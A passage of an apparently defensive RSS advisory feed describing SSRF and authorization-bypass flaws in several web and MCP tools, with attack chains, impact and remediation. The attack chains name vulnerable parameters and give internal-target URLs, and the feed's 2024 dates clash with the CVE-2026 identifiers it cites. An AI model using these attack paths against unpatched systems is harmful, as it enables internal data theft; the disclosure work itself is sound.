<li>Deploy the Sigma rule <code>Detect Nginx-UI SSRF via X-Node-ID Header</code> to identify requests with the <code>X-Node-ID</code> header that may indicate SSRF attempts.</li>
<li>Deploy the Sigma rule <code>Detect Nginx-UI Malicious Node Creation</code> to detect the creation of cluster nodes with suspicious URLs (e.g., internal IPs).</li>
<li>Monitor network connections originating from the Nginx-UI server to internal IPs and cloud metadata endpoints using existing network monitoring tools.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>nginx-ui</category><category>web-application</category></item><item><title>Server-Side Request Forgery in mcp-data-vis</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-mcp-data-vis-ssrf/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-mcp-data-vis-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in AlejandroArciniegas' mcp-data-vis due to improper handling of HTTP requests, potentially allowing remote attackers to make arbitrary requests through the vulnerable server.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability has been identified in AlejandroArciniegas&rsquo; mcp-data-vis, specifically affecting versions up to commit de5a51525a69822290eaee569a1ab447b490746d. The vulnerability resides within the <code>axios</code> function in <code>src/servers/web-scraper/server.js</code>, a component responsible for handling HTTP requests. An attacker can exploit this flaw to force the server to make requests to arbitrary internal or external resources, potentially exposing sensitive information or allowing further exploitation of internal systems. The exploit has been publicly disclosed. The lack of versioning details due to the rolling release nature of the project makes it difficult to pinpoint specific affected releases.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an endpoint in <code>mcp-data-vis</code> that utilizes the vulnerable <code>axios</code> function within <code>src/servers/web-scraper/server.js</code>.</li>
<li>The attacker crafts a malicious HTTP request to the identified endpoint, embedding a URL that points to an internal resource (e.g., <code>http://localhost:6379/</code>) or an external resource controlled by the attacker in the request parameters.</li>
<li>The <code>mcp-data-vis</code> server, upon receiving the malicious request, processes the attacker-controlled URL using the <code>axios</code> function without proper validation or sanitization.</li>
<li>The <code>axios</code> function then initiates an HTTP request to the attacker-specified URL.</li>
<li>The server receives the response from the targeted resource.</li>
<li>If the target is an internal service, the response might contain sensitive data such as configuration files, internal service status, or API keys.</li>
<li>The <code>mcp-data-vis</code> application inadvertently returns the response from the internal/external resource to the attacker.</li>
<li>The attacker analyzes the response, extracts sensitive information, or leverages the SSRF vulnerability to further compromise the internal network or external targets.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability could allow an attacker to read internal files, access internal services, and potentially gain unauthorized access to sensitive information. The lack of response from the project maintainers exacerbates the risk, leaving users vulnerable to attack. The specific impact will vary depending on the internal resources accessible from the <code>mcp-data-vis</code> server.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect all HTTP requests handled by <code>src/servers/web-scraper/server.js</code> for potentially malicious URLs to detect exploitation attempts (see Sigma rule &ldquo;Detect SSRF Attempts via HTTP Request Parameters&rdquo;).</li>
<li>Deploy the Sigma rules provided to detect potential SSRF attempts targeting the mcp-data-vis application.</li>
<li>Monitor network connections originating from the mcp-data-vis server for unusual outbound traffic to internal or external resources (see Sigma rule &ldquo;Detect Outbound Connections from Web Scraper Server&rdquo;).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>vulnerability</category><category>mcp-data-vis</category></item><item><title>pygeoapi Unauthenticated SSRF Vulnerability in OGC API - Processes Subscriber</title><link>https://feed.craftedsignal.io/briefs/2024-01-pygeoapi-ssrf/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-pygeoapi-ssrf/</guid><description>pygeoapi versions 0.23.0 to 0.23.2 contain an unauthenticated server-side request forgery (SSRF) vulnerability where OGC API process execution requests can use the subscriber object to make requests to internal HTTP services, which is resolved in version 0.23.3 by disabling internal requests by default.</description><content:encoded><![CDATA[<p>pygeoapi versions 0.23.0, 0.23.1, and 0.23.2 are vulnerable to Server-Side Request Forgery (SSRF). The vulnerability stems from the OGC API - Processes functionality, specifically how it handles the <code>subscriber</code> object during process execution. An unauthenticated attacker can exploit this flaw to send requests to internal HTTP services, potentially gaining access to sensitive information or triggering unintended actions within the internal network. This issue was patched in version 0.23.3 by disabling internal HTTP requests by default, unless explicitly allowed in the configuration. The patch includes the introduction of an <code>allow_internal_requests</code> directive for administrators who require this functionality. This vulnerability poses a significant risk to organizations using affected versions of pygeoapi.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies a pygeoapi instance running a vulnerable version (0.23.0 - 0.23.2).</li>
<li>The attacker crafts a malicious OGC API process execution request.</li>
<li>Within the request, the attacker manipulates the <code>subscriber</code> object.</li>
<li>The <code>subscriber</code> object is configured to target an internal HTTP service by specifying the internal service&rsquo;s address.</li>
<li>pygeoapi processes the request without proper validation of the <code>subscriber</code> object&rsquo;s target.</li>
<li>pygeoapi initiates an HTTP request to the attacker-specified internal service.</li>
<li>The internal service responds to pygeoapi.</li>
<li>pygeoapi may then relay information received from the internal service back to the attacker, or the attacker might be able to trigger actions based on the SSRF.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability allows an unauthenticated attacker to interact with internal HTTP services that should not be publicly accessible. This can lead to the disclosure of sensitive information, such as internal configurations, API keys, or customer data. The attacker may also be able to trigger actions on the internal services, potentially leading to service disruption or data manipulation. The severity of the impact depends on the nature and security posture of the internal services exposed by this vulnerability.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to pygeoapi version 0.23.3 or later to remediate CVE-2026-42352.</li>
<li>Apply the provided patch <a href="https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef">3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef</a> if upgrading is not immediately feasible.</li>
<li>If upgrading or patching is not immediately feasible, disable process-based resources in the pygeoapi configuration as a workaround.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>pygeoapi</category><category>ssrf</category><category>ogc api</category><category>cve-2026-42352</category><category>vulnerability</category><category>cloud</category></item><item><title>JoeCastrom mcp-chat-studio Server-Side Request Forgery Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-mcp-chat-studio-ssrf/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-mcp-chat-studio-ssrf/</guid><description>A server-side request forgery vulnerability exists in JoeCastrom mcp-chat-studio up to version 1.5.0 in the LLM Models API component, allowing remote attackers to manipulate the req.query.base_url argument and potentially conduct further attacks.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability has been identified in JoeCastrom&rsquo;s mcp-chat-studio, affecting versions up to 1.5.0. The vulnerability resides within the LLM Models API, specifically in the <code>server/routes/llm.js</code> file. An attacker can remotely exploit this flaw by manipulating the <code>req.query.base_url</code> argument. This allows the attacker to make arbitrary HTTP requests from the server, potentially leading to information disclosure, internal service access, or other malicious activities. The vulnerability is publicly known and actively discussed, increasing the risk of exploitation. The vendor was notified but has not yet responded.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an mcp-chat-studio instance running a vulnerable version (&lt;= 1.5.0).</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>/routes/llm.js</code> endpoint.</li>
<li>Within the request, the attacker manipulates the <code>req.query.base_url</code> parameter to point to an attacker-controlled server or an internal resource.</li>
<li>The mcp-chat-studio server processes the request and, due to the SSRF vulnerability, makes an HTTP request to the URL specified in the <code>req.query.base_url</code> parameter.</li>
<li>If the attacker controls the <code>base_url</code>, they can intercept the request and potentially steal sensitive information.</li>
<li>If the <code>base_url</code> points to an internal resource, the attacker may gain unauthorized access to internal services or data.</li>
<li>The attacker analyzes the response from the manipulated request to gather information about the internal network or services.</li>
<li>The attacker leverages the gained information to further compromise the mcp-chat-studio instance or the internal network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability can allow an attacker to read sensitive data from internal services, potentially leading to credential theft or data exfiltration. It can also be used to pivot to other internal systems, causing a wider breach. The lack of vendor response increases the risk, as no patch or mitigation is currently available. The CVSS v3.1 base score is 7.3, indicating a high severity vulnerability.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor web server logs for requests to <code>/routes/llm.js</code> containing suspicious URLs in the <code>req.query.base_url</code> parameter using the provided Sigma rule.</li>
<li>Implement network segmentation to limit the impact of potential SSRF attacks by restricting access from the mcp-chat-studio server to internal resources.</li>
<li>Since no patch is available, consider applying a web application firewall (WAF) rule to filter requests to <code>/routes/llm.js</code> that contain potentially malicious URLs in the <code>req.query.base_url</code> parameter.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-7147</category><category>ssrf</category><category>mcp-chat-studio</category></item><item><title>ChatGPTNextWeb NextChat SSRF Vulnerability (CVE-2026-7178)</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-nextchat-ssrf/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-nextchat-ssrf/</guid><description>ChatGPTNextWeb NextChat versions up to 2.16.1 are vulnerable to server-side request forgery (SSRF) due to improper input validation in the storeUrl function, allowing remote attackers to potentially access internal resources or conduct other malicious activities.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability, identified as CVE-2026-7178, affects ChatGPTNextWeb NextChat versions up to 2.16.1. The vulnerability resides in the <code>storeUrl</code> function within the <code>app/api/artifacts/route.ts</code> file, specifically related to the Artifacts Endpoint component. An attacker can manipulate the <code>ID</code> argument to force the server to make requests to arbitrary internal or external resources. This issue was reported to the project maintainers but remains unpatched. The availability of a public exploit increases the risk of active exploitation. This vulnerability allows attackers to bypass network access controls, potentially accessing sensitive data or internal services.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an instance of ChatGPTNextWeb NextChat running a version up to 2.16.1.</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>/api/artifacts</code> endpoint.</li>
<li>The request includes a manipulated <code>ID</code> parameter within the request body or query string of the HTTP request to <code>storeUrl</code> function.</li>
<li>The <code>storeUrl</code> function, lacking proper input validation, uses the attacker-supplied <code>ID</code> to construct a URL.</li>
<li>The NextChat server initiates an HTTP request to the attacker-controlled URL.</li>
<li>Depending on the crafted URL, the server may access internal resources, external websites, or cloud services.</li>
<li>The server receives the response from the target resource.</li>
<li>The attacker leverages the SSRF vulnerability to read sensitive internal data, interact with internal services, or potentially pivot to other internal systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7178 allows an attacker to perform unauthorized actions within the network where the NextChat server is deployed. This may include reading internal files, accessing other internal applications or services, or potentially escalating privileges if the targeted internal service has its own vulnerabilities. Given the publicly available exploit, organizations using vulnerable versions of NextChat are at increased risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade ChatGPTNextWeb NextChat to a version greater than 2.16.1 to remediate CVE-2026-7178.</li>
<li>Deploy the Sigma rule &ldquo;NextChat SSRF Attempt&rdquo; to detect suspicious requests to the <code>/api/artifacts</code> endpoint with potentially malicious <code>ID</code> parameters.</li>
<li>Monitor web server logs for outbound connections originating from the NextChat server to unusual or internal IP addresses and domains.</li>
<li>Implement strict input validation on the <code>ID</code> parameter of the <code>storeUrl</code> function if immediate patching is not possible.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category><category>ssrf</category><category>cve</category><category>vulnerability</category><category>web-application</category></item><item><title>WeKan SSRF Vulnerability in Webhook Integration</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-wekan-ssrf/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-wekan-ssrf/</guid><description>WeKan before 8.35 is vulnerable to server-side request forgery (SSRF), allowing attackers with integration modification privileges to set webhook URLs to internal network addresses, leading to unauthorized HTTP POST requests and potential comment manipulation.</description><content:encoded><![CDATA[<p>WeKan, a popular open-source kanban board application, is susceptible to a server-side request forgery (SSRF) vulnerability in versions prior to 8.35. This flaw resides in the handling of webhook integration URLs, where insufficient validation allows attackers to specify arbitrary internal network addresses as webhook targets. An attacker with the ability to create or modify integrations within WeKan can exploit this vulnerability. By crafting a malicious webhook URL, they can force the WeKan server to issue HTTP POST requests to attacker-controlled internal targets, potentially exposing sensitive internal resources and data. This vulnerability can also be chained with another flaw to overwrite arbitrary comment text without authorization checks, increasing the potential for data manipulation and unauthorized access.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains access to a WeKan account with privileges to create or modify integrations.</li>
<li>The attacker navigates to the webhook integration settings within a WeKan board.</li>
<li>The attacker enters a malicious URL pointing to an internal server (e.g., <code>http://internal.example.com/admin</code>) in the webhook URL field.</li>
<li>The attacker triggers an event on the WeKan board (e.g., creating a new card, moving a card).</li>
<li>The WeKan server, without proper validation, sends an HTTP POST request to the attacker-specified internal URL.</li>
<li>The internal server receives the request, potentially revealing sensitive information about the WeKan board and its contents.</li>
<li>The attacker exploits response handling to overwrite arbitrary comment text without authorization checks.</li>
<li>The attacker gains unauthorized access to internal resources or sensitive data through the SSRF vulnerability.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability allows attackers to potentially access internal network resources that are otherwise inaccessible from the outside. This could lead to the disclosure of sensitive information, such as internal application configurations, database credentials, or other confidential data. Furthermore, the ability to overwrite arbitrary comment text can be used to deface WeKan boards, spread misinformation, or disrupt normal operations. The CVSS v3.1 base score for this vulnerability is 8.5, indicating a high severity risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade WeKan to version 8.35 or later to remediate CVE-2026-41455.</li>
<li>Implement network segmentation to limit the impact of potential SSRF attacks.</li>
<li>Deploy the Sigma rule <code>DetectSuspiciousWekanWebhookUrls</code> to identify attempts to exploit this vulnerability by monitoring for requests to internal IP addresses or unusual domains.</li>
<li>Enable web server logging for the WeKan instance to capture details of outgoing HTTP requests.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>wekan</category><category>cve-2026-41455</category></item><item><title>TencentCloudBase CloudBase-MCP Server-Side Request Forgery Vulnerability (CVE-2026-7221)</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-cloudbase-ssrf/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-cloudbase-ssrf/</guid><description>A server-side request forgery vulnerability exists in TencentCloudBase CloudBase-MCP up to version 2.17.0, allowing remote attackers to manipulate the `req.body.url` argument in the `openUrl` function of `mcp/src/interactive-server.ts` to conduct SSRF attacks.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability has been identified in TencentCloudBase CloudBase-MCP, affecting versions up to 2.17.0. The vulnerability resides in the <code>openUrl</code> function within the <code>mcp/src/interactive-server.ts</code> file. This flaw enables a remote attacker to manipulate the <code>req.body.url</code> argument passed to the open-url API Endpoint, forcing the server to make requests to arbitrary internal or external resources. Successful exploitation could lead to information disclosure, internal network scanning, or denial-of-service. The vulnerability is publicly known and actively exploitable. Users are advised to upgrade to version 2.17.1, which includes a patch (identified as 3f678a1e7bd400cd76469d61024097d4920dc6b5) to address this issue.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a CloudBase-MCP instance running a vulnerable version (&lt;= 2.17.0).</li>
<li>Attacker crafts a malicious HTTP request targeting the <code>openUrl</code> API endpoint.</li>
<li>The malicious request includes a <code>req.body.url</code> parameter containing a URL pointing to an internal resource (e.g., <code>http://localhost:8080/admin</code>) or an external server controlled by the attacker.</li>
<li>The CloudBase-MCP server, without proper validation, processes the request and attempts to open the URL specified in <code>req.body.url</code>.</li>
<li>If the URL points to an internal resource, the server retrieves the content of that resource and potentially exposes it to the attacker.</li>
<li>If the URL points to an external server, the server makes an HTTP request to the attacker&rsquo;s server, potentially leaking sensitive information like internal IP addresses or API keys.</li>
<li>The attacker analyzes the response from the server to gather information about the internal network or the CloudBase-MCP instance.</li>
<li>The attacker leverages the gathered information to further compromise the CloudBase-MCP instance or the internal network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability can allow attackers to read sensitive information from internal services, bypass firewall restrictions, and potentially gain unauthorized access to internal resources. This could lead to the disclosure of confidential data, compromise of internal systems, and further attacks on the organization&rsquo;s infrastructure. Although the number of victims isn&rsquo;t specified, any unpatched CloudBase-MCP instance is vulnerable.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade TencentCloudBase CloudBase-MCP to version 2.17.1 or later to apply the patch (3f678a1e7bd400cd76469d61024097d4920dc6b5) that fixes CVE-2026-7221.</li>
<li>Implement input validation and sanitization on the <code>req.body.url</code> parameter to prevent manipulation by attackers.</li>
<li>Monitor web server logs for suspicious requests to the <code>openUrl</code> API endpoint with unusual or internal URLs, and deploy the Sigma rules below.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>SSRF</category><category>CVE-2026-7221</category><category>TencentCloudBase</category></item><item><title>RustFS Notification Target Admin API Authorization Bypass</title><link>https://feed.craftedsignal.io/briefs/2024-01-rustfs-admin-auth-bypass/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-rustfs-admin-auth-bypass/</guid><description>A vulnerability in RustFS allows a non-admin user to overwrite a shared admin-defined notification target, leading to event interception and audit evasion due to missing admin-action authorization on notification target admin API endpoints.</description><content:encoded><![CDATA[<p>A critical authorization bypass vulnerability exists in RustFS versions 0.0.2 and earlier, specifically within the notification target admin API endpoints (<code>rustfs/src/admin/handlers/event.rs</code>). These endpoints lack proper admin-action authorization, failing to call <code>validate_admin_request</code>. This oversight allows a non-admin user to overwrite admin-defined notification targets by name. Successful exploitation enables attackers to intercept events intended for legitimate administrators and evade audit logs. The attacker gains the ability to redirect bucket events to an attacker-controlled endpoint, potentially exfiltrating sensitive information like object keys, bucket names, user identities, and request metadata. This issue was patched in RustFS version 1.0.0-alpha.94.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains access to a RustFS account with non-admin (readonly) privileges.</li>
<li>The attacker crafts a PUT request to one of the notification target admin API endpoints (e.g., to create or update a notification target).</li>
<li>The request bypasses the intended admin authorization checks due to the missing <code>validate_admin_request</code> call.</li>
<li>The attacker overwrites an existing, admin-defined notification target, replacing the legitimate endpoint with an attacker-controlled URL.</li>
<li>An S3 bucket event (e.g., object creation) occurs, triggering the notification system.</li>
<li>RustFS sends an HTTP request containing event data to the attacker-controlled URL.</li>
<li>The attacker captures the exfiltrated event data, including object keys, bucket names, user identities, and request metadata.</li>
<li>The attacker can also delete unbound targets or silently redirect events from bound targets, further evading audit detection.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows attackers to intercept sensitive data related to bucket events, potentially leading to data breaches and unauthorized access to resources. The vulnerability affects RustFS instances where non-admin users have access to the system, enabling them to manipulate notification targets intended for administrative purposes. The attacker can redirect events to an external endpoint, exposing potentially thousands of events containing sensitive information. The ability to overwrite existing notification targets allows for a persistent compromise until the vulnerability is patched.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade RustFS to version 1.0.0-alpha.94 or later to patch the vulnerability.</li>
<li>Deploy the Sigma rule &ldquo;Detect RustFS Notification Target Manipulation&rdquo; to identify attempts to modify notification targets via the admin API.</li>
<li>Monitor web server logs (cs-uri-query, cs-method) for unusual activity related to the notification target admin API endpoints to detect potential exploitation attempts.</li>
<li>Implement strict access control policies to limit non-admin user access to sensitive API endpoints and resources.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>authorization-bypass</category><category>ssrf</category><category>event-interception</category></item><item><title>BidingCC BuildingAI SSRF Vulnerability (CVE-2026-7065)</title><link>https://feed.craftedsignal.io/briefs/2024-01-buildingai-ssrf/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-buildingai-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in BidingCC BuildingAI up to version 26.0.1, allowing remote attackers to manipulate the `url` argument in the `uploadRemoteFile` function of `file-storage.service.ts` to conduct SSRF attacks.</description><content:encoded><![CDATA[<p>BidingCC BuildingAI, up to version 26.0.1, is vulnerable to a server-side request forgery (SSRF) attack. The vulnerability resides within the <code>uploadRemoteFile</code> function located in <code>packages/core/src/modules/upload/services/file-storage.service.ts</code>. An attacker can remotely manipulate the <code>url</code> argument passed to this function to force the server to make requests to arbitrary internal or external resources. This vulnerability has been publicly disclosed and is considered exploitable. The vendor was notified of the issue, but has not responded. Successful exploitation can lead to information disclosure, internal service compromise, or other malicious activities.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a BidingCC BuildingAI instance running a vulnerable version (&lt;= 26.0.1).</li>
<li>Attacker crafts a malicious URL containing the address of an internal resource or external server.</li>
<li>Attacker calls the <code>uploadRemoteFile</code> API endpoint, providing the crafted URL as the <code>url</code> argument.</li>
<li>The <code>uploadRemoteFile</code> function, without proper validation, uses the provided URL to initiate a request.</li>
<li>The BuildingAI server makes an HTTP request to the attacker-specified URL.</li>
<li>If the URL points to an internal resource, the server retrieves sensitive data from that resource.</li>
<li>If the URL points to an external server controlled by the attacker, the server may leak internal information (e.g., internal IP addresses) or be used for further attacks.</li>
<li>The attacker receives the response from the manipulated request, achieving information disclosure or a foothold for further exploitation.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of the SSRF vulnerability (CVE-2026-7065) in BidingCC BuildingAI can lead to the exposure of sensitive internal information, such as configuration files, internal service endpoints, and potentially database credentials. This information can be leveraged to further compromise the BuildingAI instance or other internal systems. The impact is significant due to the potential for lateral movement and privilege escalation within the affected organization&rsquo;s infrastructure. The lack of vendor response exacerbates the risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule provided below to detect exploitation attempts against the <code>uploadRemoteFile</code> endpoint (Log source: webserver).</li>
<li>Implement strict input validation and sanitization on the <code>url</code> parameter of the <code>uploadRemoteFile</code> function to prevent arbitrary URL requests (CVE-2026-7065).</li>
<li>Consider restricting outbound network access from the BuildingAI server to only necessary resources to limit the impact of successful SSRF attacks.</li>
<li>Monitor web server logs for unusual requests originating from the BuildingAI server to detect potential SSRF activity.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-7065</category><category>web-application</category></item><item><title>Algovate xhs-mcp Server-Side Request Forgery Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-algovate-ssrf/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-algovate-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in Algovate xhs-mcp 0.8.11 within the xhs_publish_content function, allowing a remote attacker to manipulate the media_paths argument and potentially access internal resources.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability has been identified in Algovate xhs-mcp version 0.8.11. The vulnerability resides within the <code>xhs_publish_content</code> function of the MCP Interface component, specifically concerning the handling of the <code>media_paths</code> argument. This flaw allows a remote attacker to potentially manipulate server-side requests, gaining unauthorized access to internal resources or services. This vulnerability matters to defenders because a successful SSRF attack can lead to sensitive data exposure, internal network reconnaissance, or even further exploitation of other internal systems. The affected version is 0.8.11.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies the vulnerable <code>xhs_publish_content</code> function in <code>src/server/mcp.server.ts</code>.</li>
<li>Attacker crafts a malicious request targeting the <code>media_paths</code> argument.</li>
<li>The malicious request contains a URL pointing to an internal resource or service.</li>
<li>The server processes the request without proper validation of the <code>media_paths</code> value.</li>
<li>The server initiates a request to the attacker-specified internal resource.</li>
<li>The server receives the response from the internal resource.</li>
<li>The server may display or utilize the data obtained from the internal resource.</li>
<li>Attacker gains access to sensitive information or can potentially use the server as a proxy to interact with other internal systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-7417) could allow an attacker to read internal files, access internal services, or potentially pivot to other internal systems. This could result in the disclosure of sensitive data, compromise of internal infrastructure, or further exploitation. The exact scope of the impact depends on the internal resources accessible to the vulnerable server.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply any available patches or updates for Algovate xhs-mcp to address CVE-2026-7417.</li>
<li>Implement strict input validation and sanitization for the <code>media_paths</code> argument in the <code>xhs_publish_content</code> function.</li>
<li>Monitor web server logs for suspicious requests containing internal IP addresses or unusual hostnames in the <code>media_paths</code> parameter. Implement the &ldquo;Detect Suspicious SSRF Attempt&rdquo; Sigma rule to assist with detection.</li>
<li>Consider deploying network segmentation and access controls to limit the impact of potential SSRF attacks.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>SSRF</category><category>algovate</category><category>xhs-mcp</category></item></channel></rss>